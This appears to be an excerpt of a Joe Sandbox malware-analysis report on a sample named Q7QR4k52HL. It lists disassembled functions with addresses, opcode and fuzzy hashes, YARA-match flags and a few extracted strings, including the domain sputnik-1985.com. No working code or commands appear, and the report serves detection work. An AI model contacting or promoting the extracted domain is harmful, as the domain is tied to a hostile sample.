Opcode ID: 761fee75f665dfa1eaae6b06a030ceb1e4930ac75bffb75f1212cbb352e39214
Instruction ID: e58a9c241393c577c0dbf69e703309a02622358f74323d7420d86702d8d0d07f
Opcode Fuzzy Hash: 761fee75f665dfa1eaae6b06a030ceb1e4930ac75bffb75f1212cbb352e39214
Instruction Fuzzy Hash: 245112B0521B008BC7249F25C8616B3BBF1EF52345B084E5DC4C38BB45E739A948CBA5

Function 00827137 Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

*+, xrefs: 008272D0

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: *+
API String ID: 0-2181965719
Opcode ID: 2bbcc82fd047366a200e277a7b52cff4fec95a2559de0f56e174b4bebb18c894
Instruction ID: 8c5c11cf2f9bc7778ca73ac5bf386ff814eb9123162ea3dd04478f0769514e9f
Opcode Fuzzy Hash: 2bbcc82fd047366a200e277a7b52cff4fec95a2559de0f56e174b4bebb18c894
Instruction Fuzzy Hash: 1E6121B140A3C18BD370CF2588957DBBBE2BF96318F54891CD5C89B244EB384186CB87

Function 00850E12 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

}I\, xrefs: 00850F0D

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: }I\
API String ID: 0-3759065986
Opcode ID: df1d40a0c1601d316635205874302e9800cae571c9b88acd49baf0bd568f005e
Instruction ID: 1d9be8c44d13d2e5ddf47047446ca0cef14817362835a24e9af65ad4c7507e8a
Opcode Fuzzy Hash: df1d40a0c1601d316635205874302e9800cae571c9b88acd49baf0bd568f005e
Instruction Fuzzy Hash: E6315A605546928BDB21CF34C9927B6BBB0FF47314B144B59C8C1CB681EB38A586CF81

Function 00440BAB Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

}I\, xrefs: 00440CA6

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: }I\
API String ID: 0-3759065986
Opcode ID: e3c383380369b29b5d77e71a9769f4c1954532aface20423e04adb5d790b1dad
Instruction ID: 06326f033c1d303d2a0c44ae50e6a95f42fac71f38a9198839615570ed5a6674
Opcode Fuzzy Hash: e3c383380369b29b5d77e71a9769f4c1954532aface20423e04adb5d790b1dad
Instruction Fuzzy Hash: 653126605546928BEB258F34C8A27B7BBB0FF47310F144759C8C18B785EB78A992CB85

Function 00826D15 Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

, xrefs: 00826D4C, 00826D8F, 00826DD2

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3019521637
Opcode ID: 59ebb6f1c1a99dc460b157ce1b0bc87d6a21890c15c4f19892189c2b52108220
Instruction ID: 8a37a3bb6b7c8f548097bac8e5357857a432d338e3c3b2a5ad751653ece0fe2d
Opcode Fuzzy Hash: 59ebb6f1c1a99dc460b157ce1b0bc87d6a21890c15c4f19892189c2b52108220
Instruction Fuzzy Hash: A8112271708250AFD7608B28DD8676B73E6FBC2324F288628D194C72D2EB35D8908A06

Function 0081A070 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

sputnik-1985.com, xrefs: 0081A076

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: sputnik-1985.com
API String ID: 0-2531595869
Opcode ID: 4819dc0f6de97b22ad09cbe1b8aaee834e7d75527e88b13adc304dc11fbca5b5
Instruction ID: 45c1659c972910bbf7a7294cd8ee75fb9a7634abd3281d713f8216ade618d971
Opcode Fuzzy Hash: 4819dc0f6de97b22ad09cbe1b8aaee834e7d75527e88b13adc304dc11fbca5b5
Instruction Fuzzy Hash: BFE09A78911545CFC7088F58C8626B6B7B0FF0B304B14A469D982EB320E3389945C7AD

Function 00409E09 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

sputnik-1985.com, xrefs: 00409E0F

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: sputnik-1985.com
API String ID: 0-2531595869
Opcode ID: 84beeb3c5bb1be39499917fe814a390f6ab807b448fb432cd8e841c3168bb7c5
Instruction ID: 764d9d3a4717be79920da73eaae230af95e7e9d95c2812270fe992c1b9b69a95
Opcode Fuzzy Hash: 84beeb3c5bb1be39499917fe814a390f6ab807b448fb432cd8e841c3168bb7c5
Instruction Fuzzy Hash: 6FE09A389141058FC708CF58C862677B7B0EF0B301F14A06AD982EB3A0E3389D02C7AC

Function 0082F937 Relevance: .8, Instructions: 817COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee3c8babdd8ca27d4c7d2d50a63fd452c7c20a463d5d8a55cf4e65cb5b776805
Instruction ID: 1c88b74313f3adcc758ea68dd436d425e6077c380f137494702b9753207b64ef
Opcode Fuzzy Hash: ee3c8babdd8ca27d4c7d2d50a63fd452c7c20a463d5d8a55cf4e65cb5b776805
Instruction Fuzzy Hash: 1D72B1B1618F808ED329CF3C8815397BFD6AB5A324F188B5DA0FA877D2CB7561018756

Function 00813157 Relevance: .7, Instructions: 670COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a0560caf1e005bf9593c23293c27da937b43b9d2d83b6212584ccfc0756e270
Instruction ID: ad828feca44699e90f8e1d80edc4451e847cc7b5cb5bc14655ff5a32c711530b
Opcode Fuzzy Hash: 2a0560caf1e005bf9593c23293c27da937b43b9d2d83b6212584ccfc0756e270
Instruction Fuzzy Hash: 7A52E1715083858BCB15CF18C0906EABBE5FF89318F198A6DF8DA97381D774DA89CB41

Function 00402EF0 Relevance: .7, Instructions: 670COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a0560caf1e005bf9593c23293c27da937b43b9d2d83b6212584ccfc0756e270
Instruction ID: f14b1a32a054cc5d02357b16e4139c05c7a1a12d214dcc5fef3fcda50377de84
Opcode Fuzzy Hash: 2a0560caf1e005bf9593c23293c27da937b43b9d2d83b6212584ccfc0756e270
Instruction Fuzzy Hash: 3C52F2715083458FCB14CF24C0806AABFE1BF89314F198A7EF8996B391D779DA49CB85

Function 00821BB6 Relevance: .7, Instructions: 666COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37211a9a704324c1d47da4259e683596f8723382af120e69f7f272388f5a9581
Instruction ID: 745fd6db007de8035869b4455dcff3b022b9e3021403705702a3bb639fe13622
Opcode Fuzzy Hash: 37211a9a704324c1d47da4259e683596f8723382af120e69f7f272388f5a9581
Instruction Fuzzy Hash: 9242D6B1A04B408FD714DF38D88536ABBE1FF95314F288A2DD5ABC7392D635A486C742

Function 00816AB7 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac5a0a914cdb46c0dd636e39918af3488c68668d3e5188023bb58f14171f3048
Instruction ID: 57a3a0b30190019ec52aa83a02ead36dc322cd2f4aadc3b5d19c8e51a1773c2a
Opcode Fuzzy Hash: ac5a0a914cdb46c0dd636e39918af3488c68668d3e5188023bb58f14171f3048
Instruction Fuzzy Hash: 6052B170A08B888FE731CB24C4843E7BBE5FF51314F14492ED5EA86782D279A9C5D746

Function 00406850 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e90048c5e85cf3c38a1b76a8b8bc06c7f3e5a8f31bed9412d846d1be308970a
Instruction ID: 65e2e910a3c29fe674c350ea84f17f1873166e83f436a48a2f56d7b4a0c34cae
Opcode Fuzzy Hash: 8e90048c5e85cf3c38a1b76a8b8bc06c7f3e5a8f31bed9412d846d1be308970a
Instruction Fuzzy Hash: 7652E270A08B848FE731DB24C4847A7BBE1EB52310F15483ED5EB167C2D37DA9958B4A

Function 00840A75 Relevance: .6, Instructions: 614COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f25be90f7b65d58be15c4d88bb4d641b8ec0ac9c1adb1457478fca83ecd3ec3
Instruction ID: b1c631e8ad6833a57161fc2440417d9773deb94bd71be911471700b756136137
Opcode Fuzzy Hash: 6f25be90f7b65d58be15c4d88bb4d641b8ec0ac9c1adb1457478fca83ecd3ec3
Instruction Fuzzy Hash: 4742B3B0505B809FD315CF39C996793BFE1AB56314F18CA9DE4EE8B382C2399445CB92

Function 0043080E Relevance: .6, Instructions: 614COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f25be90f7b65d58be15c4d88bb4d641b8ec0ac9c1adb1457478fca83ecd3ec3
Instruction ID: 7a46f96e6aa3aa7fe73ff395c1311c5ab64b68b87e261d37d1a00d802d05be89
Opcode Fuzzy Hash: 6f25be90f7b65d58be15c4d88bb4d641b8ec0ac9c1adb1457478fca83ecd3ec3
Instruction Fuzzy Hash: 9942B4B0505B809FD315CF39C996793BFE1AB56314F18CA9ED4EE8B382C2399445CB91

Function 00817887 Relevance: .6, Instructions: 612COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8bb466db5d070fb099be5cdb0fd94ca4abf5b60ced88e2066174f7cb2904948
Instruction ID: 771ba3a14efafbfe7bbf047a1199d7c62b65a8939e351b0476ed7419c5fa0cd0
Opcode Fuzzy Hash: a8bb466db5d070fb099be5cdb0fd94ca4abf5b60ced88e2066174f7cb2904948
Instruction Fuzzy Hash: 7A12C232A0C7158BC725DF18D8806BBB3F9FFC4319F19892DD986D7285D734A8958782

Function 00407620 Relevance: .6, Instructions: 612COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8bb466db5d070fb099be5cdb0fd94ca4abf5b60ced88e2066174f7cb2904948
Instruction ID: ccb3959594043c792932c0cfc7d39f61c3b1d77d2143a35f25ab615b2c98e1b5
Opcode Fuzzy Hash: a8bb466db5d070fb099be5cdb0fd94ca4abf5b60ced88e2066174f7cb2904948
Instruction Fuzzy Hash: 9812B432A0C7118BD725DF18D8806ABB3E1BFC4315F19893ED986A7385D738B8518B87

Function 00813B67 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 302ca6eb955e12cdbb1b2a3d679feaf83e016e060d4fed8bf4a7c2766afae2b3
Instruction ID: 52e807e191dd29b8ea8409511df41713d86c77de67cf2c8e05af0abedbc320e6
Opcode Fuzzy Hash: 302ca6eb955e12cdbb1b2a3d679feaf83e016e060d4fed8bf4a7c2766afae2b3
Instruction Fuzzy Hash: A9322170914B158FC368CF29C5805AABBF6FF95710B604A2ED6A787E90D736F985CB00

Function 00403900 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba850d03f0ab7e2665174e53d7acfed008f992a92a5e68a4f1054f1f90159d3f
Instruction ID: 8ec60f5116ed2b9ea6bd41125fce4102d17c63a0885b3531693fd8b8e290e5dc
Opcode Fuzzy Hash: ba850d03f0ab7e2665174e53d7acfed008f992a92a5e68a4f1054f1f90159d3f
Instruction Fuzzy Hash: 09322370914B118FC328CF29C68052ABBF5BF85711B604A2ED697A7B90D73AF945CB18

Function 00426C76 Relevance: .6, Instructions: 581COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0af6f60d34b4f0c8cbc000c65ea523940a6645594962f293f067da5df6a1c82
Instruction ID: d2e23a67c1903cd1e9c185385271eb72bcb916f6a4fd91b19e1fe5de6aa7faac
Opcode Fuzzy Hash: f0af6f60d34b4f0c8cbc000c65ea523940a6645594962f293f067da5df6a1c82
Instruction Fuzzy Hash: 4B122775B00226CBDB14CF68D8917AFB7B2FF8A300F5980A9C441AB3A5D7399D42DB54

Function 00441B20 Relevance: .5, Instructions: 485COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ed04d1aadee5d9975ad14dd288c61f94734ae74a00a271e6c6ecfca463d8728
Instruction ID: 0c2c903ba8ab9d1616d7dcc2afe94072de716e40dc01c7b757aa9311b81398a3
Opcode Fuzzy Hash: 7ed04d1aadee5d9975ad14dd288c61f94734ae74a00a271e6c6ecfca463d8728
Instruction Fuzzy Hash: 41E1ED35609340CFD348CF68E89062BB7E2FB8A315F19897DE98687362D738E945CB45

Function 0081EC17 Relevance: .5, Instructions: 474COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c02c56f115fc56fc7ef3cf88c78f70bbdbcded8e53bb9888c4cf7ade8dd62519
Instruction ID: 29d219cbdd406c975aefad5c85cce406ed9201a056dc9e634df3ffa977b657d2
Opcode Fuzzy Hash: c02c56f115fc56fc7ef3cf88c78f70bbdbcded8e53bb9888c4cf7ade8dd62519
Instruction Fuzzy Hash: E71219F4904B00AFC361DF39D946797BFE8EB46360F144A2EE5EEC6281D73161458BA2

Function 0040E9B0 Relevance: .5, Instructions: 474COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de8441dc8558bd65ef57b2f38886fcfa8a7ddead37638b165e75500baaeb92e2
Instruction ID: 0d842de8c269587a107e17bcba800491c000644a8f7bd6d00a783dd33ebb532c
Opcode Fuzzy Hash: de8441dc8558bd65ef57b2f38886fcfa8a7ddead37638b165e75500baaeb92e2
Instruction Fuzzy Hash: 5D123CF0900B00AFC360DF39D946797BFE8EB46360F144A2EE5EE97281D73561158BA6

Function 00815D17 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e66362c8fb9e42a485a20769d13899b4c0de8f0fb50873082383503af3f25fbe
Instruction ID: f0ab4e22251535b2e1e47dd1b4dea9414ba58e6641d2e538728266e43df07302
Opcode Fuzzy Hash: e66362c8fb9e42a485a20769d13899b4c0de8f0fb50873082383503af3f25fbe
Instruction Fuzzy Hash: ACF1AB356087418FC724CF29C8816AAFBE6FFD9300F08882DE5D987751E675E885CB96

Function 00405AB0 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 782d56cc06f3b6973921e2512ebb950397a26f9326316825ec2b076d036e3b03
Instruction ID: c31a76099084191e3034c22a37ea28885ef806c0d431935db3893f7feff996f6
Opcode Fuzzy Hash: 782d56cc06f3b6973921e2512ebb950397a26f9326316825ec2b076d036e3b03
Instruction Fuzzy Hash: 92F1DE356087418FC724CF29C88066BFBE6EFD9300F08882EE5D597791E679E845CB96

Function 00441BB0 Relevance: .4, Instructions: 434COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dcc4d5277b36dac776057e78f9084025f62fcd9f21b15548ac392c780013685
Instruction ID: 324ad5c95dff1901f2f9d6c111dcb15fcefbb6efdba5ce0306a944ad1c6f7bef
Opcode Fuzzy Hash: 5dcc4d5277b36dac776057e78f9084025f62fcd9f21b15548ac392c780013685
Instruction Fuzzy Hash: F0D1EC35619341CFD348CF28D89062BB7E2EB8A315F09897DE98687362D738E945CB45

Function 00441C40 Relevance: .4, Instructions: 426COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42e109b0e37bac0480ee13d708fd3766a8d6e3a1db4133bb64c56ef7ed5ee544
Instruction ID: dc21f79cdc73c015b7bd86b7114b814d04dcd303e05c17d6c0f759f64c7459c0
Opcode Fuzzy Hash: 42e109b0e37bac0480ee13d708fd3766a8d6e3a1db4133bb64c56ef7ed5ee544
Instruction Fuzzy Hash: D4D1ED356193408FD358CF38D89062BB7E2EBCA315F09897DE88687392D738E905CB46

Function 0082D667 Relevance: .4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24456b8a2a5717e075ed712887d6e124a34d9247993dd7218bbcb4bbbbc13bbd
Instruction ID: 68662af9d893d27f8605a0dd281845bcbe9e4050c66f836ea0e20aa7f289d2c5
Opcode Fuzzy Hash: 24456b8a2a5717e075ed712887d6e124a34d9247993dd7218bbcb4bbbbc13bbd
Instruction Fuzzy Hash: 35C1C271908311AFEB109F24DC45B1ABBE2FF99325F148A3DF898D72A0D7729945CB42

Function 0041D400 Relevance: .4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72020315f9591e10a925340aaa42bd314528023c988bae550c98a300e050c010
Instruction ID: 381d8ba9b41755d1dc6d15d311edfbcab53db212d726a0c48d74eb4341d637bc
Opcode Fuzzy Hash: 72020315f9591e10a925340aaa42bd314528023c988bae550c98a300e050c010
Instruction Fuzzy Hash: 63C146B5908300AFD7109F24DC81B9BBBE2BFD5354F148A2EF4E8932A1D77998458B46

Function 00842D8B Relevance: .4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a42bc307b6df4b8a2997052392abae3ba1b04b865f6d04cebd1ac29fa035a6ac
Instruction ID: 9fdd2a9b00739af4d0b0671e37242908e36e78287dd77def74cee624592cd26b
Opcode Fuzzy Hash: a42bc307b6df4b8a2997052392abae3ba1b04b865f6d04cebd1ac29fa035a6ac
Instruction Fuzzy Hash: 07F10971609B808FD325CB3CC8517A6BBE2FF96314F1D8A6CD1EA8B392D635A445C711

Function 00432B24 Relevance: .4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c0a9166a04c5760c1588164b88e9ffc0143b82c709cbe52f4ad1b494d4a97c7
Instruction ID: 1ceb5ad02d8bbd155c1732c87becb70ba2bb68f476a2c3c7809d4ed59241557d
Opcode Fuzzy Hash: 8c0a9166a04c5760c1588164b88e9ffc0143b82c709cbe52f4ad1b494d4a97c7
Instruction Fuzzy Hash: 4CF13B72605B808FD315CB3CC8513A6BFE2AF9A314F1C866DD1EB8B392D679A805C715

Function 0084572B Relevance: .4, Instructions: 379COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64d23a176a35810a23fac51187625fdecd54078f476d88896bd3dcd6ea4a90e6
Instruction ID: 52d9faae1ed123dd4682f971c86c2b9b7233c28c854be9aeab98c0e5aa3966ec
Opcode Fuzzy Hash: 64d23a176a35810a23fac51187625fdecd54078f476d88896bd3dcd6ea4a90e6
Instruction Fuzzy Hash: 69F19B62625AC18FE3158B3DC811396FFE2AB66304F0CCAAED0D9CB787C16DE5418B55

Function 004354C4 Relevance: .4, Instructions: 379COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9313d19cdd044b57c5ead0796368d96046328bd9f89c17f02012ef33b6c5538c
Instruction ID: 3f1c9d1a024df14266348ce370e510d7f88b70138a1f1607deade05ec74f5600
Opcode Fuzzy Hash: 9313d19cdd044b57c5ead0796368d96046328bd9f89c17f02012ef33b6c5538c
Instruction Fuzzy Hash: 3DF19B62625AC18FE3158B3DC811396FFE2AB66304F1CCAAED0D9CB787C12DE5418B55

Function 00824E87 Relevance: .4, Instructions: 352COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 784a6082fd36e0f2db424425c66ea396cbe7c3108031eaa283b40557bcb29b39
Instruction ID: 51ca0cc5a91dc368a6736fd49d7bd7e7b2d9ab3018659f1f351030f2edc98608
Opcode Fuzzy Hash: 784a6082fd36e0f2db424425c66ea396cbe7c3108031eaa283b40557bcb29b39
Instruction Fuzzy Hash: 728144B2A1472087D724DF28DC9266B73E1FFD1314F08852CE8868B795EB789945C792

Function 00822442 Relevance: .3, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0704939d3ffdea9ec5931a0f43224e15fa154c614923ed6ac8c930f834d7e03
Instruction ID: 3c40f094547769ef40ac0c4f079f6990f17f431f3664e8c319ffe0017cc4870d
Opcode Fuzzy Hash: d0704939d3ffdea9ec5931a0f43224e15fa154c614923ed6ac8c930f834d7e03
